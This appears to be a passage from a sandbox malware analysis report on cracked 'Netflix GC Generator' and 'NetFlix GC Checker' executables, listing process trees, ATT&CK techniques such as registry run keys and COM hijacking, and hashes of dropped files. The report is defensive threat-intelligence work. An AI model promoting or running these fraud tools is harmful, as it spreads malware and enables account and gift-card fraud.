    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cracked.to/SpaceXVIII
    3⤵
    PID:13296
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7ffc09a746f8,0x7ffc09a74708,0x7ffc09a74718
      4⤵
      PID:13308

C:\Users\Admin\Desktop\Generators PACK\Netflix GC Generator By SpaceXVIII\Netflix GC Cracked.to.exe
"C:\Users\Admin\Desktop\Generators PACK\Netflix GC Generator By SpaceXVIII\Netflix GC Cracked.to.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:13872
- C:\Users\Admin\Desktop\Generators PACK\Netflix GC Generator By SpaceXVIII\Gen\Launcher.exe
  "C:\Users\Admin\Desktop\Generators PACK\Netflix GC Generator By SpaceXVIII\Gen\Launcher.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:14016
- C:\Users\Admin\Desktop\Generators PACK\Netflix GC Generator By SpaceXVIII\Gen\GC.exe
  "C:\Users\Admin\Desktop\Generators PACK\Netflix GC Generator By SpaceXVIII\Gen\GC.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:14108
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cracked.to/SpaceXVIII
    3⤵
    PID:14248
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7ffc09a746f8,0x7ffc09a74708,0x7ffc09a74718
      4⤵
      PID:14260

C:\Users\Admin\Desktop\Checkers PACK\NetFlix GC Checker by xRisky\NetFlix GC Checker by xRisky.exe
"C:\Users\Admin\Desktop\Checkers PACK\NetFlix GC Checker by xRisky\NetFlix GC Checker by xRisky.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5856
- C:\Users\Admin\Desktop\Checkers PACK\NetFlix GC Checker by xRisky\data\Launcher.exe
  "C:\Users\Admin\Desktop\Checkers PACK\NetFlix GC Checker by xRisky\data\Launcher.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1876
- C:\Users\Admin\Desktop\Checkers PACK\NetFlix GC Checker by xRisky\data\litedb.exe
  "C:\Users\Admin\Desktop\Checkers PACK\NetFlix GC Checker by xRisky\data\litedb.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
  PID:3984

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\7-Zip\7-zip.dll

Filesize
99KB

MD5
d346530e648e15887ae88ea34c82efc9

SHA1
5644d95910852e50a4b42375bddfef05f6b3490f

SHA256
f972b164d9a90821be0ea2f46da84dd65f85cd0f29cd1abba0c8e9a7d0140902

SHA512
62db21717f79702cbdd805109f30f51a7f7ff5f751dc115f4c95d052c5405eb34d5e8c5a83f426d73875591b7d463f00f686c182ef3850db2e25989ae2d83673

Download Submit
C:\Program Files\7-Zip\7z.dll

Filesize
1.8MB

MD5
1143c4905bba16d8cc02c6ba8f37f365

SHA1
db38ac221275acd087cf87ebad393ef7f6e04656

SHA256
e79ddfb6319dbf9bac6382035d23597dad979db5e71a605d81a61ee817c1e812

SHA512
b918ae107c179d0b96c8fb14c2d5f019cad381ba4dcdc760c918dfcd5429d1c9fb6ce23f4648823a0449cb8a842af47f25ede425a4e37a7b67eb291ce8cce894

Download Submit
C:\Program Files\7-Zip\7zFM.exe

Filesize
963KB

MD5
004d7851f74f86704152ecaaa147f0ce

SHA1
45a9765c26eb0b1372cb711120d90b5f111123b3

SHA256
028cf2158df45889e9a565c9ce3c6648fb05c286b97f39c33317163e35d6f6be

SHA512
16ebda34803977a324f5592f947b32f5bb2362dd520dc2e97088d12729024498ddfa6800694d37f2e6e5c6fc8d4c6f603414f0c033df9288efc66a2c39b5ec29

Download Submit
C:\ProgramData\NSGMFX\UMT.exe

Filesize
2.6MB

MD5
87cb2ae170a8c6dcd8296612ba50501a

SHA1
572eb20649a03414c61cf65a6af0e60d79c96fd5

SHA256
393c56977292cbe3a7316d3b76ca8f216b445f0c3dd1f4da89f753d0d12184af

SHA512
1cc9dcc25976eda389c14210ca279504210b5c0ce2699560f4883ddc922eab17c6bc9a3a25168376a62b49476d8b053f83a0a6e13eb10a2c1a73a83b7a755be8

Download Submit
C:\ProgramData\UYR\UMT.004

Filesize
4KB

MD5
7774133de04c64bee5bab5cb040b53fe

SHA1
45af535d49af4b86741edb40fc6137ae6dec9419

SHA256
3080d9252d42324311ae20417074e486acaff0f5e9d3765a31aeacf9a883010f

SHA512
eaaf28d85bcc571e35fe9bf3b19efb8952b73f04192617f7d1f2e0a868340a63882d2d55ff5888d90dc3d893fd1c7dfc77559f8d4e1a416f2ab7b299d9d323fc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NetFlix GC Checker by xRisky.exe.log

Filesize
1KB

MD5
c95e300f659a8dea609dc3501d232db3

SHA1
05139e1e74079d136c326912af4938a3bbc1de9c

SHA256
b580eb8d5f8f97e90448655df1fc477aea550783f935ff53fb8abcc3351a0eee

SHA512
eb91768559b7ff33818c30491dc922241a9d2cf2a0816116bbbf33a2b43a535d89406fd32265e33054333d597e9243ebc359b2bfe91ff01d21008894d317ca0c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\7d95cdf3-0779-4478-aac3-63b6a90062c9.tmp

Filesize
11KB

MD5
21b1642a41f9c97c3b5220cf10b02104

SHA1
d9a77e2bb359a0320655bb76ae829b5202285f88

SHA256
1c8504b48d053310c82d38703cc3a6da9c86f877774bd7d9106be38eb0cf83aa

SHA512
5077e383bb20b65956c93a4ae704a8f8910f2ea9a6ad6677edabe0252f402b5252cd033c3b588c2e9fe70ec60305c28de96bd8e7a2a83e0b6a6799304a784485

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
20a0cd267695a326bb4c85dfac0568b5

SHA1
0ff5d03e4f52625ce6204dcd74b398c14f4652a9

SHA256
15defdc807b3f79f68aec26f416e7a39157c054fa432637ccd4664163255e749

SHA512
16d8e35c83813e2c9b90df595cbc97801082daf40d8b186d17a4c04aec69248c2894169f7ce4accb7d2d9d5dbbe612c53f340e4f1075a8a46d94ed11d73380ee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
6dda6e078b56bc17505e368f3e845302

SHA1
45fbd981fbbd4f961bf72f0ac76308fc18306cba

SHA256
591bf3493eb620a3851c0cd65bff79758a09c61e9a22ea113fa0480404a38b15

SHA512
9e460013fd043cee9bdbcdaf96ac2f7e21a08e88ddb754dddbd8378ee2288d50271e66b42092d84a12e726469465185be11a6fafab6ed4236a244524bd60f502

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
f6126b3cef466f7479c4f176528a9348

SHA1
87855913d0bfe2c4559dd3acb243d05c6d7e4908

SHA256
588138bf57e937e1dec203a5073c3edb1e921c066779e893342e79e3d160e0b4

SHA512
ef622b26c8cee1f767def355b2d7bffb2b28e7a653c09b7e2d33f6468a453fff39fd120cacbffd79ce35722592af0f3fb7d5054e2dca06310e44dc460533f3d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000017

Filesize
75KB

MD5
a6d02c8487789f7892dd8478ae4c4f1a

SHA1
7ae769adc02432439f31c33b409c3998f3044d46

SHA256
6d7cebf499b489d4c05da0f53e1c87715213e6b2017a01ee396159e05ce1c8c1

SHA512
aacc40bd379a8274939bef95c53d4a9df20cb40d8477d3b0d59bdc79da9a9fc8315d35657a6c678339b5b1ca6eb00eb02f1f35352ac420e6a633a7ad3ad17719

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000018

Filesize
101KB

MD5
f3c92081725a58494ca3e39716c3dc59

SHA1
63973d92d2e83844a498c0931e410e4fe5a1f23f

SHA256
e2a95efc6725d304f23d037dd775f5b82203bd040163dcde89125ebcbaf90d22

SHA512
a321aa8a2572b488aa67e91a1e19b623ac9c2405ae001df371250c9294897b488eac7fd2b694aabfdc49f145d1f29ce42b4fe68661917eef78076d49f574ad3a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000019

Filesize
52KB

MD5
fca50b2137197c5394e8af20a68fda4c

SHA1
aefe3f37500b9d1b21331a04f77fbf45f202c5c9

SHA256
b2e3fe8f53b76f08b14fd2f2e9c464eb2325d0f00a6c3d55afc647ac244ae787

SHA512
7343dfc3f5b785455c5e3f587159f014cce644ddf8a2f61b4c7e339f8e61c9b741e9d613ec3d43b650fbdb3321a2871af7eb5decd32bca921749b1bfec17e317

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001a

Filesize
20KB

MD5
87e8230a9ca3f0c5ccfa56f70276e2f2

SHA1
eb116c8fd20cb2f85b7a942c7dae3b0ed6d27fe7

SHA256
e18d7214e7d3d47d913c0436f5308b9296ca3c6cd34059bf9cbf03126bafafe9

SHA512
37690a81a9e48b157298080746aa94289a4c721c762b826329e70b41ba475bb0261d048f9ab8e7301e43305c5ebf53246c20da8cd001130bf156e8b3bd38b9b8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001b

Filesize
144KB

MD5
92163ddb6f3d4bff15c3887e4040f28b

SHA1
dc05a763ba46c9f8ad107a34ca440183ee23d3e3

SHA256
b8b78d88e06f762b921da2f6069a25084a178a632d7e37e840c500b1b400f564

SHA512
134fec20db3deec965eb83529dfec449f725574158e4075b59e528d00b932c734adef94b219e940a87d83d7d87eb76ae4aa6117199b079d26f229bd50030f7dd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001c

Filesize
20KB

MD5
bec2af13143a7771b0b89cec2ab92b27

SHA1
9cd25b2c17a630fd0d6dae4aa80ea510ef4b89b2

SHA256
52aa9c3bdb64b5d1c1fe6dbf456fc50da434916b6c7489f3c64a0ea9253408ab

SHA512
42d00250350982b0d3f26b84f33cc1365c8ab57f830f2f859cf3cdc8ba2879c09249264b1177c4b85de6a2461efe06620668c8d5bb036fde0b0030fa246075b6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001d

Filesize
32KB

MD5
57632c3e3288b2d52d3a6ac63d989c5a

SHA1
8bd0a80782c89a5da2e8d950205dcd93aab5387e

SHA256
f63506da8221e2480de12f403a9a18c91470ca131cf67b83dd7e003dcedaa611

SHA512
e63931370f5449e16030189ea1e5da61bb654f61e34b713fc46e0e20071c1b1f5d52fdb8ac6495fe4d2de1929b0eb2ca6a1214b2dd99133b6f2cdbfdf6f36554

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001e

Filesize
101KB

MD5
622921477473e93dd9223d6a6047dae2

SHA1
c6a5bc5a590fa0c75b3725ceb8b2628671ec54a3

SHA256
b1ee18ec4b74bd98f27151f10efdf21e03ae7b5c8398309de570318eedd29b0f

SHA512
df56309937468d93ac2478141e5111568b5e18c3e16d20f62e437e60f5e5a3b8212fbc17feb1cb089490f5f627dd62899ea5506535b3f5e99ee3783cca4eb6e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001f

Filesize
33KB

MD5
68eae8ae528b3cf4965c780505e8274b

SHA1
23eea22c5ced491f0933dbdc428503548ae48636

SHA256
5c677af2d6e78de58c66b09577213d4b1c23cf0409822378053f1c457ff465aa

SHA512
7fb225df90deaeff597ea4513985545b5ca6d3b4478dbe5969554f15ff4b2c1652c6220b970304884adfc2860be045599130534f1c45586a7adcfb29a8e72ac7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000020

Filesize
26KB

MD5
13d1b429e99059f97e58fa10dd69f8b5

SHA1
174c7f299158103127d50de82f1086c3b66e8258

SHA256
1262bff0591c36094d058ab102b84ce34eb1e547e8ff00557bf8d55449e58e40

SHA512
30dbd99f1abe8d2a9ddf73a93ed199ffb2b55903b5bc2618935a64ad54706f054fc9b46a80ccd1cab4eff3f5a607b5b599f5e02a2e89c990e10b210e4f16ed9d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000021

Filesize
881KB

MD5
e0edc621e4ffaa368d2e0677d3f137e6

SHA1
e374bb44d1834cf6eb688eabe1820aa5f7c827d3

SHA256
13da46f8e9749704bfff6b6f51a202c87facf593280dfde4127e5858c28aaeaf

SHA512
d60643fe87788d76dcf1cd941002ceef18390cac5eaa683bce2e2dbeaba684b6fd656a94187379b71105333590412d65b3466cc9c37cdaada7e009c1c9f8435e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000022

Filesize
17KB

MD5
f84839a66cfa6e400c8356101ccc76f4

SHA1
5db86c3e55a951801a43996643b52c000974d559

SHA256
888fea4957ea758ac1692a1b02e08e923c882fe2b4125c93ab5b95752cbf8a9c

SHA512
18cefbbfdb572250d6b2bda60a05614118cd10b5620ef0b7b63f27f6053c92017d0b8648e874a22c08f21f8a4dbbfa5ca4e72955250a949b14b3e409fa69bbd4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000023

Filesize
28KB

MD5
100525fda826153b1423ec073a8e3a67

SHA1
445ef1f8ce1bcd6eeba656b79a546a22abcaf1ca

SHA256
3a76fa089b3cea203afbf00ae108effc9555fd35ef2a4a803e6ce3e55167aeaa

SHA512
76893ec1231181851a0f6718e8939102837c5a4b6f5dc7c5e8800b26e284ec4f769d56f7850876d034ec8e66681b16c10c1a0b8d7cdea346d2feae4bf7a024cf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000024

Filesize
24KB

MD5
dcab8f9443952c7589be3e4db6072853

SHA1
824ca8c921eeca604844d3f00d08691631199201

SHA256
a1a2a8e83029575fa6afde2c7b946fd3d98407fccf673c587aac398cd2fc8cef

SHA512
464cbe4f3e5f5578228e93a26fbcff435ed99fcf7cb37d6a232b716f6b0c46fefd86a84a47177c19cd753918617c7f665b61f18c856f87fc716a0961ec436bf1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000025

Filesize
558KB

MD5
3d61ceee5cb58b916c82eb799097a04e

SHA1
6b588d784829f97cd174d1241102ebcc3cdd1094

SHA256
c4e5b4e1fb9f05680ef169ed3156b9fe72aef4ccfa2371c587b7edd26a35651e

SHA512
0549fa2e3da7163b21825a8a7440188443ce65cb7e4993362497c78acc1f7c666d4ab1eacd40046f7233ba4b411e352c3861c165df012db54a0625344f9e3321

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000026

Filesize
16KB

MD5
17642a65d26526c1daffd4e2cc616095

SHA1
4c0f8532d20c282f7ac4ab3810bfd2ac2eb68b3e

SHA256
323d0acd8b4c0e63c5d7d2e12432bb95a0342a7935c02d4ee725f0a0a92e182b

SHA512
6eea19ca228e6033abc5e5ad452b5c5f6192e2f37a43f5d65a90b52c7d7c71f1b1e6dce13708910d81cd70202f0cfecc5e163cf03f2a5c5e725e021be462b28e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000027

Filesize
73KB

MD5
44d537ab79f921fde5a28b2c1636f397

SHA1
b2879f9e1d0985a96842bf7f55a2b2cc4c636d04

SHA256
3d1080625d3030e88357b3ac9aa377dcec23f1b529c4ad03f7a9a435ccae04be

SHA512
08836d89ba7c7b7645c9de36e2e856cdc31fbb1c3a4a83045848d772720b98d352fb11182471161ef07d01739953a6320355ffecf25a06881bb1111ba02a73cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000028

Filesize
101KB

MD5
027750e22f1bfdd5dbb874cd9bac03a4

SHA1
9c45fb04ec5133a6f0d6c671edf28c111aee10a3

SHA256
9c68c82a97848ca6da0df9b32ddcb1c10503e95e6f67ac9b92371274cab324e2

SHA512
8f55a51c9fa263a08c7788ae4e0615cdadd8f4e56265fad0baf5f79807c4fab342213eeb17a6455047cd7d15fc741921d4adcaf8724fb889eb46bb5273aa8407

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000029

Filesize
31KB

MD5
a5000941d6fcf9782819c5af267378e3

SHA1
4e438025036f937afffab4e152004a2dd2a24206

SHA256
0862ec5b3a05cb86d40f6f6eacf7b71e13130fb6efee40c1abc3d6c27d800c6d

SHA512
794a2fbcb0352857e4b830da2a1e99dd4c404c6840204fe623214b7b671cd00c23cd6253126465da8f614584bf3461543f2083460758c3471a10ebea5221ab0f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00002a

Filesize
18KB

MD5
8eff0b8045fd1959e117f85654ae7770

SHA1
227fee13ceb7c410b5c0bb8000258b6643cb6255

SHA256
89978e658e840b927dddb5cb3a835c7d8526ece79933bd9f3096b301fe1a8571

SHA512
2e4fb65caab06f02e341e9ba4fb217d682338881daba3518a0df8df724e0496e1af613db8e2f65b42b9e82703ba58916b5f5abb68c807c78a88577030a6c2058

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00002b

Filesize
18KB

MD5
c83e4437a53d7f849f9d32df3d6b68f3

SHA1
fabea5ad92ed3e2431659b02e7624df30d0c6bbc

SHA256
d9bada3a44bb2ffa66dec5cc781cafc9ef17ed876cd9b0c5f7ef18228b63cebb

SHA512
c2ca1630f7229dd2dec37e0722f769dd94fd115eefa8eeba40f9bb09e4fdab7cc7d15f3deea23f50911feae22bae96341a5baca20b59c7982caf7a91a51e152f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00002c

Filesize
73KB

MD5
cccc9d29470e879e40eb70249d9a2705

SHA1
5fe986cda635681b4b6bbd6111df2f26d7fca286

SHA256
d3caf12591d194712facd10bca14f0a924edb59c24447a3fd994a48286db8843

SHA512
396ec6b4c95e2ecfa5835b44762b588331088d0c06f79e3c0eeca93b7e907bf4695d054f933ec2d0171de11add3cf0c78aa400e9e9b7cd09792707200a5eacb0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00002d

Filesize
110KB

MD5
264487dc6d053ee583d4523d82ab0965

SHA1
a27525964f9bbd28e5bec889824c78db35fbd473

SHA256
2ce9909db4beabe5da1658c215120ee24f6507c0a24d6a0f1bcee09fd90d8eef

SHA512
bf0f54405e85015b5bc7923086af31817730f53c13871105771ac97ccf026e3a74b6272387bb9180a4aed5e2937e0abdec3f47c3a6ed41b78397e16e2923a096

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
b98487ab445a7273cf962515c776c6ad

SHA1
1754f86a725ad399b82cab564f96058ec8134632

SHA256
fa03724f899236d8a350ad49728a8be822b4088f2ddcc7a944d3087dc3a39045

SHA512
af30b236230b63e8624eb1ad2ca56c7f5556bb25a7870f8bfa1d7e1e512af932bad42ebc1bef2800dc945a7311f951089fd48043b66a80e132ab65b9424d0b95

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
fc99608b99d630e169c4597cb27a641c

SHA1
c208b0a50e2112b53cd0b6c4573ef499994e3b5e

SHA256
5d615f000610c7b1941f234e4aa29d5b80e84bef8b3ea6e740bb468d89a63323

SHA512
b9f7f31adbf96a6b9c1111941a69693d1d9b59ec0de71e78238f1f3e2f753b78c2ace76ca494d0799f9cc89a5a1f4f59c56ee862d31bf7ee6cf18267c77b192d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
a829d77262165dba1da3829f6f93dd7a

SHA1
1f54a960775e0a115f1955720bdd6f0072447ef3

SHA256
f46f8c8e5a74f43c4bd1faa210e465a8361d8e0b8e236f3fb8e91f4ee40a7481

SHA512
345e82bab8f1b0d9760ede628c7fb870e89680582f6a635036ead06de22888bcc3d000487c78fa79731d0ccfc2f4650c319160c07bf03ac817293d334a747e26

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
48B

MD5
5cb9c74fe6c1a9aa68d510fa96cca447

SHA1
bf2bb7e0245cabaf30285d6b12dc3b1d07c22903

SHA256
a1d33bc567767e692dc1cf560cb78b10e28f91aa7c07c964e5810ed64fd2e08d

SHA512
367a0df0653732b282deb925fe594161bd1e304af67db0f0bbeec6fe0b56c5b6c4842795e9fb8311d99a9acfd6bcdaaf1e365e17366f7c18f88a6725aa7119e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
960B

MD5
fc27c66d0a554bbe2628e644982741d9

SHA1
2b58870ae307294c84ffe395a7372a37126c9dee

SHA256
21a1d14f60fa500924fcf92ec0a4faa1ae5dbe03a25d3ee442bbeec00a0f40cf

SHA512
b34a26dcb9a1d9f4446caf2f46f56dc1908a5c7b47b533aa333d2ed17dd48777b8bce1ec022eccf9e860c2ce4caf3496fadd83fff5a84f421b32ceabc208c844

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

Filesize
70KB

MD5
e5e3377341056643b0494b6842c0b544

SHA1
d53fd8e256ec9d5cef8ef5387872e544a2df9108

SHA256
e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25

SHA512
83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
5KB

MD5
c51ec3e0000c7ba7bb1d131f07d80b5b

SHA1
b28489de57ac110249653baa2afa747f41a26da0

SHA256
fc0c69c31a7d8315240c03b511ed26a85a2b1493b35d5de6bea00a19fdbc1962

SHA512
db976eec1508ca0ba5268c18db5f6053732f7d611e8384d408556326ea11f67f21bec5631a5cb2afc87f937bd958a14a1ab8d95b17ce33bd878ba112c736292f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
4KB

MD5
bbb12293167851c4ffefbc248f7ed90b

SHA1
ce9a8451716b942a89b4b4e50f795802939b609e

SHA256
17d019dabf73d3c60d6e030d48e224ef71e0a1be9e2f1b09e0e42045072709f6

SHA512
43306cacab22b09f66e8edd1b90131bbf2dd98fce50e893950f51fe061fb153c30fe7e1e8f089d4de8464f48ed75f0030f61038abf4b3a8dc40fdac9be5d04b4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
5KB

MD5
6c0b3eb54db7c78ef4992eea97d431da

SHA1
159e7976918c7faa17564ba892ddd83cb547dff4

SHA256
e17e7f67ad78ab7717cb9bc1501eda4524a582f15d94f9c4ced4bddd5df532fd

SHA512
6d44474d5104c7e55091a4691129f1959fc964a4ad007f99b95c413c451c471db9708e0118263cd27142a13bb7ccb7aa6a7b6bf56dc00394d7dae0550a164d82

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
59B

MD5
78bfcecb05ed1904edce3b60cb5c7e62

SHA1
bf77a7461de9d41d12aa88fba056ba758793d9ce

SHA256
c257f929cff0e4380bf08d9f36f310753f7b1ccb5cb2ab811b52760dd8cb9572

SHA512
2420dff6eb853f5e1856cdab99561a896ea0743fcff3e04b37cb87eddf063770608a30c6ffb0319e5d353b0132c5f8135b7082488e425666b2c22b753a6a4d73

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
3KB

MD5
5b5106df45db271f80555efc741ef6c9

SHA1
eb56c5665e52621d5a9e3b15acac2ef3cc074ecc

SHA256
305a809915819c56c88eb0e1d7bb2ec0623194fc53ab2d23bf2e0c6d64771fca

SHA512
8952d59eb3a58a2448504b9c1beee073abd395fb38f16f95220b10fb3aba57c39c5502f2b0bf89703f6fd31c74be538f0ba8af432e0d28821b21f50175f7adc0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
3KB

MD5
f0ed45645f4117f06aacf9191450c230

SHA1
0be5d802502a2f6b115ace3f68b97054e7c3e2f2

SHA256
bc29ebcb2b6e94d1316938acecc71750762bc67b0391bfd3b8c543b2042106fa

SHA512
0ff679dd50a53853669a1c8d4d6edd30881fe2879008a8b91ebe7223bbd51da844dea04bdc53a2ac89b84068773a6723b9f5fa1840e0b1dacbce7572e2cd3c2d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State~RFe57eacd.TMP

Filesize
59B

MD5
2800881c775077e1c4b6e06bf4676de4

SHA1
2873631068c8b3b9495638c865915be822442c8b

SHA256
226eec4486509917aa336afebd6ff65777b75b65f1fb06891d2a857a9421a974

SHA512
e342407ab65cc68f1b3fd706cd0a37680a0864ffd30a6539730180ede2cdcd732cc97ae0b9ef7db12da5c0f83e429df0840dbf7596aca859a0301665e517377b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
9KB

MD5
76097e6a096792530e1f11e5929db546

SHA1
35cbd8317fb8fe2a855c570f0f92a71a057977b3

SHA256
d9b076a340aeba2a3bf3d6b97bb46059875bd7481d5d6a0413208db27b69b45c

SHA512
6559f4896cf3ecc85b5bf118ec6fb7eb9e9aea0bfde4129aff9eea7c2fce6e28d565ffe624032b1f41f227860b16c7c60ba3fdc912938fd2c27d6b4135d369b1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
4d2593191ecd6b1c8367fab42d668b6e

SHA1
3b5ca5f1b7971488414f8af7fa17b17881ec259d

SHA256
333b19984965d264f5b1f26a93fe08305a3820c7adf4a3a4f997b7620387bbea

SHA512
a399f74041e13f0c020d314dec107c324855388da5fc01df3dc35eaa3fa751c0c6d54ceb9b71ac5f59ff01ddd73b2164e2ad4e9913bad5b33d1819fd186a12b3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
502c1e2fb3c4ce3c1a0a7351fd0dee9f

SHA1
92dc97252d986063bbf91f7ff7de36353201fa0f

SHA256
5375ef5fdb5608fb6fd7dc0ab6acd24aef9bddf75f7bd2a72a85da1e9f4e9e04

SHA512
5482887511fd2eb1fae9f7d6aeb11055c8976054fc08fe5f79abe50e0067db2c2fb9574423ea82fc59948f9aef12168528f9c5ad6d4031ecc5b189d37014a9ac

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
3710a9fb57f1090792e6b4d6e7099947

SHA1
1af9872f6ac28123fb3de90fd66523e3c8531a20

SHA256
